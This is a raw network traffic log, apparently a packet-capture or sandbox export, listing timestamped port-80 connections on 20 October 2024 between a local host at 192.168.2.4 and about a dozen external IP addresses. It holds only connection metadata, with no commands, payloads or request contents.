Oct 20, 2024 18:42:03.012974977 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:03.013025045 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:03.017947912 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:03.018098116 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:03.223037958 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:03.263705969 CEST	80	49799	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:03.263783932 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:03.263880014 CEST	49799	80	192.168.2.4	47.129.31.212
Oct 20, 2024 18:42:03.266058922 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:03.269026995 CEST	80	49799	47.129.31.212	192.168.2.4
Oct 20, 2024 18:42:03.307786942 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.312701941 CEST	80	49806	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:03.312766075 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.312983990 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.313013077 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.317814112 CEST	80	49806	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:03.317828894 CEST	80	49806	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:03.471827030 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.476857901 CEST	80	49807	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:03.476923943 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.477214098 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.477272034 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:03.482038975 CEST	80	49807	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:03.482070923 CEST	80	49807	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:04.882339954 CEST	80	49806	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:04.882504940 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:04.887693882 CEST	80	49806	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:04.887767076 CEST	49806	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:04.912759066 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:04.917634010 CEST	80	49813	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:04.917706013 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:04.917820930 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:04.917854071 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:04.922665119 CEST	80	49813	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:04.922714949 CEST	80	49813	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:05.022155046 CEST	80	49807	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:05.022214890 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.022258997 CEST	49807	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.027184010 CEST	80	49807	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:05.080218077 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.085066080 CEST	80	49815	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:05.085133076 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.085236073 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.085268021 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:05.090060949 CEST	80	49815	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:05.090116978 CEST	80	49815	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:05.815426111 CEST	80	49813	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:05.815514088 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.815598965 CEST	49813	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.820499897 CEST	80	49813	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:05.843050003 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.849394083 CEST	80	49820	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:05.849464893 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.849627972 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.849648952 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:05.854633093 CEST	80	49820	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:05.854662895 CEST	80	49820	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:06.626919031 CEST	80	49815	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:06.627038002 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:06.627063990 CEST	49815	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:06.631966114 CEST	80	49815	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:06.768047094 CEST	80	49820	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:06.768136978 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.768671989 CEST	49820	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.773650885 CEST	80	49820	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:06.816310883 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:06.821559906 CEST	80	49824	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:06.821626902 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:06.822082043 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:06.822113991 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:06.826909065 CEST	80	49824	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:06.827023983 CEST	80	49824	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:06.951472998 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.956381083 CEST	80	49827	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:06.956830025 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.956960917 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.956960917 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:06.961807966 CEST	80	49827	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:06.961836100 CEST	80	49827	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:07.856920958 CEST	80	49827	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:07.857106924 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:07.863126040 CEST	80	49827	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:07.863231897 CEST	49827	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:08.058538914 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:08.063520908 CEST	80	49833	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:08.063616991 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:08.063750029 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:08.063785076 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:08.068811893 CEST	80	49833	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:08.068840981 CEST	80	49833	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:08.355648994 CEST	80	49824	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:08.355715036 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.355824947 CEST	49824	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.362730026 CEST	80	49824	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:08.390269995 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.395773888 CEST	80	49834	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:08.396600962 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.396838903 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.396894932 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:08.402159929 CEST	80	49834	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:08.402206898 CEST	80	49834	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:09.013111115 CEST	80	49833	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:09.013195038 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.013261080 CEST	49833	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.019201040 CEST	80	49833	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:09.122060061 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.127041101 CEST	80	49838	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:09.127160072 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.127563953 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.127594948 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:09.132555962 CEST	80	49838	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:09.132586002 CEST	80	49838	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:10.068437099 CEST	80	49838	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:10.068502903 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:10.068573952 CEST	49838	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:10.074053049 CEST	80	49838	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:10.203238010 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:10.208237886 CEST	80	49845	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:10.208316088 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:10.208611965 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:10.208612919 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:10.213614941 CEST	80	49845	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:10.213644981 CEST	80	49845	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:10.388144970 CEST	80	49834	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:10.388226986 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:10.388284922 CEST	49834	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:10.393215895 CEST	80	49834	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:10.429121017 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:10.434055090 CEST	80	49848	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:10.434133053 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:10.434334040 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:10.434345007 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:10.439161062 CEST	80	49848	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:10.439287901 CEST	80	49848	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:11.363976955 CEST	80	49848	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:11.367278099 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.367460966 CEST	49848	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.372375965 CEST	80	49848	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:11.406250954 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.412050009 CEST	80	49852	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:11.412199020 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.412282944 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.412282944 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:11.417351007 CEST	80	49852	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:11.417382002 CEST	80	49852	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:12.157691956 CEST	80	49845	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:12.157763004 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.157876968 CEST	49845	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.162960052 CEST	80	49845	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:12.193451881 CEST	49855	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.198348045 CEST	80	49855	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:12.199592113 CEST	49855	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.199834108 CEST	49855	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.199897051 CEST	49855	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:12.204775095 CEST	80	49855	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:12.204978943 CEST	80	49855	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:12.311657906 CEST	80	49852	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:12.311719894 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:12.311779976 CEST	49852	80	192.168.2.4	172.234.222.138
Oct 20, 2024 18:42:12.316694975 CEST	80	49852	172.234.222.138	192.168.2.4
Oct 20, 2024 18:42:12.359179974 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:12.364047050 CEST	80	49859	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:12.364140987 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:12.364347935 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:12.364347935 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:12.369159937 CEST	80	49859	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:12.369359970 CEST	80	49859	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:12.953639030 CEST	49855	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:13.405622005 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:13.410892963 CEST	80	49863	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:13.411125898 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:13.411633968 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:13.411669970 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:13.416826963 CEST	80	49863	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:13.417377949 CEST	80	49863	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:13.574405909 CEST	80	49859	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:13.574470043 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.574516058 CEST	49859	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.579505920 CEST	80	49859	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:13.607115984 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.612293005 CEST	80	49866	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:13.612406015 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.612545967 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.612577915 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:13.617564917 CEST	80	49866	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:13.618035078 CEST	80	49866	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:14.308671951 CEST	80	49863	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:14.308744907 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.308787107 CEST	49863	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.313702106 CEST	80	49863	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:14.351646900 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.356925011 CEST	80	49868	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:14.357002974 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.357108116 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.357141018 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:14.361984968 CEST	80	49868	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:14.362157106 CEST	80	49868	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:14.932769060 CEST	80	49866	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:14.932838917 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:14.933120966 CEST	49866	80	192.168.2.4	34.246.200.160
Oct 20, 2024 18:42:14.939043999 CEST	80	49866	34.246.200.160	192.168.2.4
Oct 20, 2024 18:42:14.967763901 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:14.972738981 CEST	80	49873	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:14.972866058 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:14.977901936 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:14.977977991 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:14.982902050 CEST	80	49873	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:14.982937098 CEST	80	49873	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:15.252984047 CEST	80	49868	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:15.253057957 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:15.253114939 CEST	49868	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:15.258025885 CEST	80	49868	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:15.423341990 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:15.781354904 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:15.781444073 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:15.781613111 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:15.781613111 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:15.790695906 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:15.790725946 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:15.867336035 CEST	80	49873	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:15.867410898 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.867461920 CEST	49873	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.872477055 CEST	80	49873	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:15.901973009 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.906982899 CEST	80	49876	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:15.908786058 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.908880949 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.908915043 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:15.913850069 CEST	80	49876	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:15.913881063 CEST	80	49876	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:16.653161049 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:16.703547001 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:16.705369949 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:16.705410004 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:16.710371017 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:16.710402012 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:16.813186884 CEST	80	49876	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:16.814924002 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:16.814982891 CEST	49876	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:16.819941044 CEST	80	49876	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:16.860311031 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:16.865143061 CEST	80	49882	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:16.865219116 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:16.865411043 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:16.865423918 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:16.870311022 CEST	80	49882	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:16.871232986 CEST	80	49882	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:16.884191990 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:16.937937021 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:17.169485092 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:17.174757004 CEST	80	49884	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:17.174825907 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:17.175287008 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:17.175319910 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:17.180293083 CEST	80	49884	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:17.180315018 CEST	80	49884	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:17.718204975 CEST	80	49882	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:17.759464025 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.759708881 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.764519930 CEST	80	49888	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:17.764648914 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.764684916 CEST	80	49882	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:17.764727116 CEST	49882	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.764877081 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.764913082 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:17.769813061 CEST	80	49888	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:17.769893885 CEST	80	49888	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:18.135368109 CEST	80	49884	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:18.137671947 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.137809992 CEST	49884	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.142643929 CEST	80	49884	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:18.166362047 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.171456099 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:18.172596931 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.175440073 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.175474882 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:18.180313110 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:18.180372000 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:18.629755974 CEST	80	49888	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:18.672316074 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:18.693484068 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:18.698442936 CEST	80	49895	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:18.698544979 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:18.698743105 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:18.698798895 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:18.703572989 CEST	80	49895	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:18.703653097 CEST	80	49895	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:19.187314987 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:19.187412024 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:19.187462091 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:19.500411034 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.109806061 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.237415075 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.237919092 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.237982035 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.238503933 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.238534927 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.238535881 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.239083052 CEST	80	49895	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:20.239335060 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:20.241483927 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.244359970 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.245187998 CEST	80	49890	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:20.245237112 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.246730089 CEST	49890	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:20.247509003 CEST	80	49895	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:20.247554064 CEST	49895	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:20.334317923 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:20.339274883 CEST	80	49896	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:20.339329004 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:20.339451075 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:20.339473963 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:20.344252110 CEST	80	49896	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:20.344263077 CEST	80	49896	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:20.827959061 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.828260899 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.833142042 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:20.833206892 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.833486080 CEST	80	49800	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:20.833517075 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.833527088 CEST	49800	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.833625078 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:20.838475943 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:20.838485003 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:22.219472885 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:22.265017986 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:22.265119076 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:22.269464970 CEST	80	49896	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:22.269530058 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.269558907 CEST	49896	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.269882917 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:22.269891977 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:22.274468899 CEST	80	49896	44.221.84.105	192.168.2.4
